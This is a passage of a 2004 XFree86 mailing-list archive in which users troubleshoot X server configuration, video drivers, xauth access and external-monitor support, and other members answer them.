[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] can't start xwindow and XFree86.0.log

2004-02-06 Thread Mark Vojkovich
  You have your XFree86 configured to use the nv driver for NVIDIA
cards, yet you have no NVIDIA card in your machine.  You have 
Intel integrated graphics:  

 (--) PCI:*(0:1:0) Intel i810e rev 3, Mem @ 0xf400/26, 0xff00/19

  I think you want to be using the i810 driver.


Mark.


On Thu, 5 Feb 2004, Shelton Liu wrote:

 
 version: netBSD 1.6
 symptom: after installed netBSD, changed rc.local to enable kdm, reboot,
 then X Server crashed.
 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] ViewsonicG70fm configuration with Xfree 4.3.0 under Suse 8.2

2004-02-06 Thread William Gallafent
Corrado Topi wrote:

 The problem is I do not have the specification of the
 monitor, installed suse (who does not have the specific
 configurations for this monitor) and so I do not know what
 to put on the range.

http://www.viewsonic.com/products/crt_g70fm.htm

That page is the first one in the results of a search for
g70fm on Google, and contains the information you need.

-- 
Bill Gallafent.




pgp0.pgp
Description: signature


[XFree86] abiword install

2004-02-06 Thread ivaldes2
i've already installed abiword, however in oder to complete i am told: abiword needs 
module type 1 in xfree86, also add type1 in module section. also add the line 
/usr/local/...in the files section of /etc/x11/xf86config file, then restart the x 
server. how is this done?
i am starting to work with openbsd and this is unfamiliar to me,working with debian 
this would not be a problem, but bsd?
please be explicit with ur instructions, don't want to screw anything up. the editing 
part is no problemjust the module and restart parts. i work mostly on the terminal. 
thanks for ur help.

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Problème avec ma carte graphieu Radeon VE

2004-02-06 Thread butane
Hello guys, I have a little problem with my graphic card Radeon VE... 
This is my hardware configuration :

Power Macintosh G4
• CPU : 400 Mhz
• Memory : 256 Mb of SdRam + 512 Mb of SdRam
• HDD : Seagate Barracuda ATA IV 40 Gb (connecté sur le premier canal
IDE en slave).
• Graphic card : ATI Radeon VE (32 Mo)
• DVD-rom : Hitachi 32x (connecté sur le second canal IDE en master)
• Lecteur Zip : 100 Mb (connecté sur le second canal IDE en slave)

• Ecran : Apple Studio Display 17’ (ADC) (connected to the graphic
cardd with « DVIator for ADC ».)
• Clavier : Apple USB Keyboard (mappage Suisse Romand)
• Souris : Apple USB Mouse (1 bouton)


Thanks for the answer les gars !!!



[EMAIL PROTECTED]



XFree86.0.log
Description: XFree86.0.log


[XFree86] question - Which spaceballs are supported by the magellan driver?

2004-02-06 Thread Tijs Zwinkels
Hi all,

I've been searching the internet, various mailing list, usenet, and the
sourcecode, and i haven't been able to find the answer to my question:

Which spaceballs are working with Xfree?

Is this information available anywhere? any ideas?

I tried to get a spaceball 3003 to work with Xfree. This failed with a
'Unable to query/initialize MAGELLAN hardware.' error message. I tried
both the magellan and spaceorb drivers - without succes.

I'm sure the spaceball is working, and on the /dev/ttyS0 port which i
configured, since the drivers from 3dconnexion are working correctly. Only
problem is that these drivers do not provide Xi.

I assume the spaceball 3003 isn't supported. Now we're planning to buy a
newer spaceball which is supported by the driver, but i can't find which
spaceballs are supported.

Thanks in Advance,
Tijs Zwinkels

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Xfree86

2004-02-06 Thread Jorge Huerga








I dont know if that is
a real bug or if i mistaked
something, but when I try to startx it returns me
something about send a mail to this direction for bugs.



System is a PII at 233MHz,
4GB Hz, Debian woody 3 and Intel motherboard, with a
3D labs permedia 2 graphic board.







 Jorge Huerga Guerrero

Programación
Multimedia



 C. Principe de Asturias 10 ent. A

 03600
- Elda - Alicante

 651504270 - Fax: 96698090








XFree86.0.log
Description: Binary data


[XFree86] Whats happening with S3 prosavage DDR 3D support

2004-02-06 Thread Alex Deucher
3D support for savage chips is going on in the savage-2-0-0 branch in
DRI cvs.  It will not be available in 4.4.0. Right now support is
limited to prosavage/twister and savage4 chips and the drivers are
still somewhat buggy.  Support for older savages will come later.  FOr
the latest status, check out the info bage on the DRI website:
http://dri.sourceforge.net/cgi-bin/moin.cgi/S3Savage


Alex



Hi, first pls excuse my bad english

Finally is going to be support for 3D aceleration in xfree 4.4 ???
I tried to see the cvs change log with no luck to understand whats was
there.

Is there some place where i can see this information ??
Is there a way a can help ??

Thanks and regards
Marcel MM

__
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] ATI Radeon 9200SE, DVI output, black screen every other restart

2004-02-06 Thread Alex Deucher
4.3.0 did not handle the DVI port on 9200 chips properly, this is fixed
in cvs.  Please update to the cvs version of xfree86 or try a xfree86
or DRI snapshot.

Alex

-

Hello,

I have just hooked up my new Radeon 9200SE using the DVI output to an
NEC LCD 1880SX DVI input, and after putting the line

Options MonitorLayout TMDS, CRT

into XF86Config, am getting consistent performance.  Unfortunately, it
is also very consistent that the signal is completely gone to the
monitor after every _second_ restart of X.

Example:

Boot- no signal (solid black screen).
CTRL-ALT-BS - login screen.
Login, Logout   - no signal.
CTRL-ALT-BS - login screen.
CTRL-ALT-BS - no signal.
CTRL-ALT-BS - login screen.
CTRL-ALT-BS - no signal.

...forever

So, I am sure I have overlooked something very simple in my config that
is peculiar to using a single head on the DVI output.  If you can help,
I would be greatly appreciative.  I am using Fedora Core/1, XFree86
4.3.0.

__
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] xauth confusion on MacOS 10.3.2 (can't contact local address)

2004-02-06 Thread Sam Bayer
All -

I've encountered an oddity in the implementation of X11 on MacOS 
10.3.2 (Panther), which is based on XFree86 4.3. I originally thought 
it was a bug, but I'm beginning to suspect that it's a feature of 
XFree86 4.3 that I don't understand. I've poked around in various 
newsgroups and mailing lists on the XFree86 site and elsewhere, and I 
can't find an explanation. I apologize in advance if this question is 
covered in an obvious location.

When X11 starts up, a new .Xauthority file is generated. It contains 
hashes for my local UNIX connection, for localhost, and for the IP 
address of my computer (this is at home, where I'm using the 192.168 
set of intranet addresses, and I don't have a DNS server; at work, we 
have a DNS server, and the hostname appears instead of the IP 
address, but the same behavior occurs). It looks like this:

% xauth
Using authority file /Users/sam/.Xauthority
xauth list
Sams-Computer.local/unix:0  MIT-MAGIC-COOKIE-1 
1f177ca2630edfda3e2f7121f0a29c77
192.168.1.100:0  MIT-MAGIC-COOKIE-1  1f177ca2630edfda3e2f7121f0a29c77
localhost:0  MIT-MAGIC-COOKIE-1  1f177ca2630edfda3e2f7121f0a29c77

Note that all the hashes are identical. The odd thing is, not all of 
those host names allow me to create an xterm. My DISPLAY is :0.0. The 
following three work:

% xterm
% xterm -display Sams-Computer.local/unix:0
% xterm -display localhost:0.0
The following does not:

% xterm -display 192.168.1.100:0.0

Why? I'm just stumped. A correspondent on a different list pointed 
out that if you temporarily turn on xhost access, generate a new key 
for the IP address, and then turn xhost access off again, displaying 
to the IP address works just fine, as follows:

% xhost +192.168.1.100
192.168.1.100 being added to access control list
% xauth
Using authority file /Users/sam/.Xauthority
xauth generate 192.168.1.100:0 .
authorization id is 94
xauth Writing authority file /Users/sam/.Xauthority
% xhost -192.168.1.100
192.168.1.100 being removed from access control list
% xterm -display 192.168.1.100:0.0
Is there a bug lurking in this overall behavior? Or is it something 
important about X security I just don't get?

Thanks to all in advance -
Sam Bayer
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Major Roadblock in X install

2004-02-06 Thread Chris Ditri
Hello.

This is the first time I have ever had to get help for X.  It has always 
treated me well, but The past few days have been a real pain!

We have several ibm xserver eseries 330 machines here.  I am trying to install 
Gentoo Linux on them -- my preferred distro.  Unfortunately these computers 
ship with integrated S3 savage4 chips.

I have everything set up for X, but no matter how I tweak my config file, I 
wind up with problems where it prints out garbage to the screen.  X will come 
up until I try to start something like firebird.  I get about two or three 
mouse-clicks in, and the whole thing starts with the garbage, or crashes 
completely.  The garbage makes the screen completely illegible.

I have tried setting the XF86Config file to extremely conservative settings 
(8bit color 640x480 resolution etc. etc.)  I have tried X 4.3.0 and X 
4.3.99.902.  I have tried using XFS and without.  Nothing works.  When I look 
at the logs, this is what I get:

failed to setup write-combining range

Then it promply crashes.

I have scoured the internet, and can find no solutions.  I even downloaded the 
driver from here: http://www.probo.com/timr/savage40.html.  Same problems 
occur.

Here is my latest XF86config:

=

# File generated by xf86config.

#
# Copyright (c) 1999 by The XFree86 Project, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the Software),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# 
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# 
# THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
# THE XFREE86 PROJECT BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
# OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# 
# Except as contained in this notice, the name of the XFree86 Project shall
# not be used in advertising or otherwise to promote the sale, use or other
# dealings in this Software without prior written authorization from the
# XFree86 Project.
#

# **
# Refer to the XF86Config(4/5) man page for details about the format of 
# this file.
# **

# **
# Module section -- this  section  is used to specify
# which dynamically loadable modules to load.
# **
#
Section Module

# This loads the DBE extension module.

Loaddbe   # Double buffer extension

# This loads the miscellaneous extensions module, and disables
# initialisation of the XFree86-DGA extension within that module.
SubSection  extmod
  Optionomit xfree86-dga   # don't initialise the DGA extension
EndSubSection

# This loads the Type1 and FreeType font modules
Loadtype1
Loadspeedo
#Loadfreetype
#Loadxtt

# This loads the GLX module
#Load   glx
# This loads the DRI module
#Load   dri

EndSection

# **
# Files section.  This allows default font and rgb paths to be set
# **

Section Files

# The location of the RGB database.  Note, this is the name of the
# file minus the extension (like .txt or .db).  There is normally
# no need to change the default.

RgbPath /usr/X11R6/lib/X11/rgb

# Multiple FontPath entries are allowed (which are concatenated together),
# as well as specifying multiple comma-separated entries in one FontPath
# command (or a combination of both methods)
# 
# If you don't have a floating point coprocessor and emacs, Mosaic or other
# programs take long to start up, try moving the Type1 and Speedo directory
# to the end of this list (or comment them out).
# 

FontPath   unix/:-1

# The module search path.  The default path is shown here.

#ModulePath /usr/X11R6/lib/modules

EndSection

# **
# Server flags section.
# **

Section ServerFlags

# Uncomment this to cause a core dump at the spot where a 

[XFree86] [Request for Support] Confused keyboard driver on JVC MP-XP7210 notebook (SiS controller)

2004-02-06 Thread fis



Dear X people,

I am trying to get XFree86 4.3.0 installed on my notebook (JVC
MP-XP7210, SiS chip).  XFree86 is starting almost nicely, but the
keyboard doesn't respond properly: the only thing that happens is that
the resolution is rotated whatever key I press.  (Ctrl+Alt+BS works,
though.)

I installed 4.3.0 under /usr/local/X11R6 while keeping 4.2.1.1 under
/usr/X11R6 (debian is unhappy if the XFree86 packages are missing),
and I suspect that the problem might have something to do with parts
of 4.2.1.1 being still active.  My $PATH doesn't include /usr/bin/X11,
though, and I call /usr/local/X11R6/bin/XFree86 manually with full
path.

I am out of ideas, so I decided to bother you with this probably
stupid question.  I attach my configuration and the logfiles.  If you
need anything else please let me know.  (If this is too much data to
post without asking beforehand please bash me and I won't do it
again.)

thanks a lot,
matthias





jvc-sis-keyboard-problem.tar.gz
Description: Binary data


[XFree86] [Idea] Confused keyboard driver on JVC MP-XP7210 notebook (SiS controller)

2004-02-06 Thread fis
I forgot to mention that the neatest way to make me shut up would be
an apt source where I can get the 4.3.0 packages for debian.  (-:


thanks again,
matthias

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Problem...

2004-02-06 Thread Chris Ditri
Try this:

# cat /proc/pci

Check the output, keeping an eye out for the lines that refer to VGA.

Is your card listed there?

If it isn't then the system is not detecting it.  You can try reseating it, or 
toggling it on and off in the bios (reboot -- vga off -- reboot -- vga on).

Also, if it does show up, check the IRQ's, and see that it is not sharing an 
IRQ with another device.

Is your system a dual boot?  Does it work under windows (or any other OS)?

Finally you can try booting to a Knoppix cd and see what that turns up.  If it 
doesn't work then it is likely to be hardware related.

Chris




On Friday 06 February 2004 10:44 am, [EMAIL PROTECTED] wrote:
 Hi,

 I have attached the log file for my problem...
 I installed Redhat 7.3 and once or twice everything was fine.
 then I installed a USB PCI card and later removed it , and since then
 I cannot get X graphics to work.

 please help.

 logfile attached.

 thanks,
 Kanda.

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] [Idea] Confused keyboard driver on JVC MP-XP7210 notebook (SiS controller)

2004-02-06 Thread Luca Capello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,

on 02/06/04 16:56, [EMAIL PROTECTED] wrote:
 I forgot to mention that the neatest way to make me shut up would be
 an apt source where I can get the 4.3.0 packages for debian.  (-:
have you searched for them with Google or something similar? Or, better,
on http://packages.debian.org (source for any Debian packages)?
http://packages.debian.org/cgi-bin/search_packages.pl?keywords=xfree86-commonsearchon=namessubword=1case=insensitiveversion=allrelease=all

You should find a Debian experimental mirror and then
apt-get -t experimental install xfree86-[package]

Thx, bye,
Gismo / Luca
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org

iD8DBQFAI72aVAp7Xm10JmkRAiRdAJwObUZS7VaNN3ETg4oRniDHLhVHMgCdFam3
25jwdZYNbkT1rjNUZSctPt8=
=+oCM
-END PGP SIGNATURE-
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] [SOLUION] Confused keyboard driver on JVC MP-XP7210 notebook (SiS controller)

2004-02-06 Thread fis
i am sorry.

the solution is this:

apt-get install xbase-clients

shame on me.  seems to work now.


happy,
matthias

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] I deleted xfree86..

2004-02-06 Thread jayjwa
On Sat, 31 Jan 2004, Ryan Bradley wrote:

 Let me first give the disclaimer that I am an idiot, or at least, I am a linux 
 newbie..

 About a year ago I was trying to install perlmagick to get imagemagick to work with 
 movable type on my redhat 7.3 box which I have through rosehosting.com.

 As part of that I mess I installed xfree86, but came the conclusion once everything 
 was working that it was not necessary for me to have it in order for perlmagick to 
 work correcly.

 About 2 weeks ago I was informed I was using up more than my share of storage space 
 and so I went through and removed everything I didn't need.  This included xfree86.  
 Instead of uninstalling it I just deleted everything that seemed to be associated 
 with xfree86.


If you want to use XFree86, you must install Xfree86 and not delete it.
Try a new fresh install. Make sure you have newest version.

-Jay
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] ATI Radeon 9200SE, DVI output, black screen every other restart

2004-02-06 Thread Chad Carr
On Fri, 2004-02-06 at 05:36, Alex Deucher wrote:
 4.3.0 did not handle the DVI port on 9200 chips properly, this is fixed
 in cvs.  Please update to the cvs version of xfree86 or try a xfree86
 or DRI snapshot.

Great!  Do you happen to know whether or not the Radeon 9100 DVI
handling is proper in 4.3.0?  I have the choice between the two, and
would like to keep my system hassle-free (e.g. using precompiled
packages rather than compiling from source where possible).

In general, which Radeon would offer the best 2d/3d performance when
used with the open source drivers and the DVI output?

-- 

Chad Carr [EMAIL PROTECTED]

When a stupid man is doing something he is ashamed of, he always
declares that it is his duty.
   --George Bernard Shaw

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] [Idea] Confused keyboard driver on JVC MP-XP7210 notebook (SiS controller)

2004-02-06 Thread fis
although i already got the tarballs running, you taught me something
pretty useful about apt that i probably should have known from reading
the manuals: never heard of experimental packages...  :-)

mille grazie,
matthias



Luca Capello writes:
 From: Luca Capello [EMAIL PROTECTED]
 Date: Fri, 06 Feb 2004 17:15:23 +0100
 Subject: Re: [XFree86] [Idea] Confused keyboard driver on JVC MP-XP7210 notebook
  (SiS controller)
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Hello,
 
 on 02/06/04 16:56, [EMAIL PROTECTED] wrote:
  I forgot to mention that the neatest way to make me shut up would be
  an apt source where I can get the 4.3.0 packages for debian.  (-:
 have you searched for them with Google or something similar? Or, better,
 on http://packages.debian.org (source for any Debian packages)?
 http://packages.debian.org/cgi-bin/search_packages.pl?keywords=xfree86-commonsearchon=namessubword=1case=insensitiveversion=allrelease=all
 
 You should find a Debian experimental mirror and then
   apt-get -t experimental install xfree86-[package]
 
 Thx, bye,
 Gismo / Luca
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.2.4 (GNU/Linux)
 Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
 
 iD8DBQFAI72aVAp7Xm10JmkRAiRdAJwObUZS7VaNN3ETg4oRniDHLhVHMgCdFam3
 25jwdZYNbkT1rjNUZSctPt8=
 =+oCM
 -END PGP SIGNATURE-
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86
 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] I cannot understand this warning

2004-02-06 Thread Federico Mantovani
Hi to all the members of this mailing-list. I have just installed
FreeBSD 4.9-STABLE on my laptop a Toshiba Satellite 4030 CDS with a
Triden Cyber 9525/DVD card.
I configured the X server (I am using XFree86 4.3.0): everything seems
to work fine, but I receive in /var/log/XFree86.0.log the following warning:
(==) TRIDENT(0): Write-combining range (0xff7e,0x2) was already
clear
(WW) TRIDENT(0): Failed to set write-combining range (0xff80,0x280)
I have searched with Google and in some newsgroups for the meaning of
this warning. I repeat: everything works fine, but I'd like to know why
I get these lines in the log file. Thanks in advance.
Federico Mantovani

--
Dalla scuola di guerra della vita -
- Quel che non mi uccide, mi rende piu' forte.
   Friedrich Nietzsche

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] trouble with Xconfiguration

2004-02-06 Thread ricardo villafuerte
Hi
I mail you because im having a little problem with the X's ,, ohh sorry , 
im using Redhat 9 , i tried to reconfigure de X with Xconfigurator , but i 
didnt find it , so i searched for redhat-config-xfree , but it stays in 
the horiz and vert detection , so if you can give me anda advice im going 
to thank you so much ,

P.D . if you find something that doesnt match , please excuse me , my 
english isnt very good
  tanx

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] trouble with Xconfiguration

2004-02-06 Thread Erik Odh
Do you have any xf86config file to try with?
- Original Message -
From: ricardo villafuerte [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, February 06, 2004 7:47 PM
Subject: [XFree86] trouble with Xconfiguration


 Hi
 I mail you because im having a little problem with the X's ,, ohh sorry ,
 im using Redhat 9 , i tried to reconfigure de X with Xconfigurator , but i
 didnt find it , so i searched for redhat-config-xfree , but it stays in
 the horiz and vert detection , so if you can give me anda advice im going
 to thank you so much ,

 P.D . if you find something that doesnt match , please excuse me , my
 english isnt very good
tanx

 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86



___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Error

2004-02-06 Thread Armandrix



Dear Sirs,

First of all need ask for apologise if i´m sending 
this to wrong address or error language, I caught that in the command line error 
messages and it was in english. (i´m brazilian).

few days ago i did installed linux (cemflinux) in 
my computer with windows xp boot option (ussing windows right now) and 
i´m1st time user. I couldn´t run properly linux by errors that i couldn´t 
understand and looking up i find somethings..

actually i cannot see nothing except console grb or 
console login (after faultyattemp to load x11). At the [EMAIL PROTECTED]:~# and when i i run startx i 
have the following error message:

fatal server error: server already active for 
display 0
if the server is no longer running remove 
/tmp/.x0-lock and setart again (couldn´t did it cause i don´t know 
how)

lib: invalid mit.magic-cookie-1 key
iving up (?)
init: unable to connect to x server
init: no such process (errno3): server 
error

the last error message says to send a mail to this 
address.

May you please get me some light about 
it??

Thank you for your attemption

Armando Richard


[XFree86] GLIBC_2.3

2004-02-06 Thread kent . chen
Hi All,
 I'm trying to install OpenSSL-0.9.7a-20 for RH 7.3 and I received the
following message:
  error: failed dependencies: libc.so.6(GLIBC_2.3) is needed by
openssl-0.9.7a-20

Where can I download this library ?

Thanks,
KENT

__
NOTICE:  This communication and any files transmitted with it (communication)
may contain privileged or other confidential information. This communication is
intended solely for the individual or entity to whom it is addressed. If you are
not the intended recipient, or believe that you have received this communication
in error, please do not print, copy, retransmit, disseminate, or otherwise use
this communication.  Also, please indicate to the sender that you have received
this communication in error, and then delete this communication and any copies.
Thank you.




___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] stop

2004-02-06 Thread diogenes
stop the messages
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] end problem

2004-02-06 Thread diogenes
 my problem the end.
 thank 
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] external crt on i855 laptop

2004-02-06 Thread L. Jensen
On Thursday 05 February 2004 12:47 pm, L. Jensen wrote:
 Here's the config I've been using plus the log.

I am still very eager to get the external crt display working.  One 
possibility was to configure X so that it could drive the crt.  Luca's 
comment and some lines in the log make me think there is a chance, but I 
still don't know how to get it to work.  Do I need a change to the config?  
Must the external monitor be connected when X starts?  I copied some sections 
from the log that make me think it might work if someone can point me in the 
right direction.

Another possibility would be to figure out how to fix the keyboard hotkey 
FnF8, which should turn on the crt but is buggy, or how to fix i810switch, 
which activates the crt by writing to a location in /dev/mem but drives the 
crt at a frequency that is out of range.

There is some information about i855 graphics registers in this datasheet

http://developer.intel.com/design/chipsets/datashts/252615.htm

Could this be used to fix i810switch?  Could we program SXGA+ resolution 
without relying on the BIOS?  Would disassembling the BIOS help?  Or would we 
need better documentation from Intel to do it?  I would be very interested in 
helping with an effort to work on these issues.

Regards,
-L 

===
(--) PCI:*(0:2:0) Intel Corp. 82852/855GM Integrated Graphics Device rev 2, 
Mem @ 0xf000/27, 0xffa8/19, I/O @ 0xdc00/3
(--) PCI: (0:2:1) Intel Corp. 82852/855GM Integrated Graphics Device rev 2, 
Mem @ 0xe800/27, 0xff98/19
===
(II) I810(0): 2 display pipes available.
(II) I810(0): Display Info: CRT: attached: TRUE, present: TRUE, size: (0,0)
(II) I810(0): Display Info: TV: attached: FALSE, present: FALSE, size: (0,0)
(II) I810(0): Display Info: DFP (digital flat panel): attached: FALSE, 
present: FALSE, size: (0,0)
(II) I810(0): Display Info: LFP (local flat panel): attached: TRUE, present: 
TRUE, size: (1400,1050)
(II) I810(0): Display Info: TV2 (second TV): attached: FALSE, present: FALSE, 
size: (0,0)
(II) I810(0): Display Info: DFP2 (second digital flat panel): attached: FALSE, 
present: FALSE, size: (0,0)
(II) I810(0): Size of device LFP (local flat panel) is 1400 x 1050
(II) I810(0): No active displays on Pipe A.
(II) I810(0): Currently active displays on Pipe B:
(II) I810(0):   LFP (local flat panel)
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] external crt on i855 laptop

2004-02-06 Thread Luca Capello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,

on 02/05/04 23:30, L. Jensen wrote:
 But I still don't get the external monitor to work, even when I use
exactly
 your config.  Maybe it is something very simple I am missing.  Can you
tell
 me just how you set it up?  I don't care about Xinerama.  I really
just want
 simultaneous display on both screens.
maybe I wasn't clear: I can't get the 2 monitor together, but *or* the
LCR (at 1024x768, the maximum for my LCD) *or* the CRT (up to 1600x1200
on a SONY Trinitor Dell P1110, AFAIL the maximum for the external CRT).

If I try to get the 2 together:
- - with Fn+F8 I can't, I mean, the switch is LCD  CRT, never LCD+CRT
and anyway I get a black band on top (the same as your)
- - with 'i810switch' I get the same error you already described

 Or are you using the framebuffer?  I have not tried it at all.  Can it
even do
 X?  Or just no 3D, xvideo, etc?
Well, I never tried the 'fbdev' driver on X. I use the general VESA fb
but for the console. So, it should be useuful to give it a try, just to
know if the switching problem is at BIOS level (as I think).

Thx, bye,
Gismo / Luca
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org

iD8DBQFAI/SmVAp7Xm10JmkRAgjdAJ4rQwE2ydjc40jjdKgkWdf7StUl2ACcDaFC
v9A6ya8VVLsgTBZ2wIzOpUg=
=sDmC
-END PGP SIGNATURE-
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] vacation/vacaciones/ferioj 2004.01.30 - 2004.01.29

2004-02-06 Thread etrapani
I'm on vacation and will not be reading my mail for a while.
I will answer your mail when I return.

Estoy de vacaciones y no leeré el correo por unos días.
Contestaré su mensaje cuando regrese.

Mi ferias kaj dum kelkaj tagoj ne legos miajn mesagxojn.
Mi respondos post mia reveno.
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] X Help on Dell C600 w/NetBSD

2004-02-06 Thread Ryan Underwood

On Fri, Feb 06, 2004 at 01:47:23PM -0600, Shane Miller wrote:
Hi,
 
I have attached the log file for my problem...
I have NetBSD 1.6.1 and XFree86 4.3.0
I cannot get X graphics to work.

It looks like the graphics is working fine.  What is wrong is at the
very end -- it can't find your pointer device.  Does NetBSD put it at
/dev/psaux like Linux?  If not, you need to change that in your XFree86
config file.

-- 
Ryan Underwood, [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Re: [XFree86] external crt on i855 laptop

2004-02-06 Thread Luca Capello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,

on 02/05/04 18:47, L. Jensen wrote:
 Here's the config I've been using plus the log.  I'm also sending the
log I
 get when using exactly Luca's config from

 http://luca.pca.it/projects/asus/XF86Config-4.20031116
please take care that I changed my XF86Config-4 from a while (but
there're just minor changes), the new one is at
http://luca.pca.it/projects/asus/xfree86/XF86Config-4.i810.20040205

 I'm just looking for simultaneous display of the same desktop on both
lcd and
 crt, although crt-only would be interesting too.  As I wrote before,
nothing
 seems to work yet.  But Luca, you claim some success?
As I wrote in my previous post, yes, I use everyday an external SONY
Trinitor Dell P1110 capable of 1600x1200 (I don't have the frequencies
here at home, but I can have them tomorrow given directly by the monitor
in a precise way, if necessary). So you should be able at least to do
the same on an external CRT.

 Section Device
   Identifier  Intel82855GM[0]
   Driver  i810
   #VideoRam   65536
   VideoRam16384
cut
 (**) I810(0): VideoRAM: 16384 kByte
You should uncomment VideoRam 65536, as this is the amount of RAM
allocated by the BIOS (in my M3410C statically and I think the same in
the whole M3N line).

 (II) I810(0): LCD1024x768: Using hsync range of 30.00-121.00 kHz
 (II) I810(0): LCD1024x768: Using vrefresh range of 48.00-160.00 Hz
 (II) I810(0): Not using mode 1400x1050 (no mode of this name)
This could be a problem: a video mode 1400x1050 isn't recognized, so
you can't use it (while all the other yes). 2 days ago I enabled video
mode 1400x1050 on my GNU/Linux, in order to have it on the external CRT,
but it seems I can't get it (same problem as your). So I reviewed the
specifications for the ASUS M3N and there's no SXGA+ on CRT, as here
http://usa.asus.com/prog/spec.asp?m=M3000-N%20Serieslangs=09
Could it be an implementation of the Windows video driver, not present
in the BIOS modes?

Thx, bye,
Gismo / Luca
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org

iD8DBQFAI/tzVAp7Xm10JmkRAsD4AJ9uoy8BUWkfzXc/qwrdaxIr2Q6UNgCgjQ2I
gqllsLCLpAJxwJ1PXyVzTIk=
=HvgF
-END PGP SIGNATURE-
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] external crt on i855 laptop

2004-02-06 Thread Luca Capello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,

on 02/06/04 20:02, L. Jensen wrote:
 I am still very eager to get the external crt display working.  One
 possibility was to configure X so that it could drive the crt.  Luca's
 comment and some lines in the log make me think there is a chance, but I
 still don't know how to get it to work.  Do I need a change to the
config?
 Must the external monitor be connected when X starts?
In order to use the CRT, this *must* be connected when X starts and you
should 'startx' from a console *on* the CRT (I mean, boot on console,
switch to CRT with Fn+F8 and then log in and 'startx'). I don't know any
other way to change the XF86Config-4 values while X is running, even if
I know this is possible (at least for the Synaptics TouchPad on/off).

 Another possibility would be to figure out how to fix the keyboard hotkey
 FnF8, which should turn on the crt but is buggy, [...]
Well, the Fn+F8 isn't completely buggy, it turns on the CRT but only the
CRT, I mean, not LCD+CRT. So, I think it's not a Fn+F8 problem.

 [...] or how to fix i810switch,
 which activates the crt by writing to a location in /dev/mem but
drives the
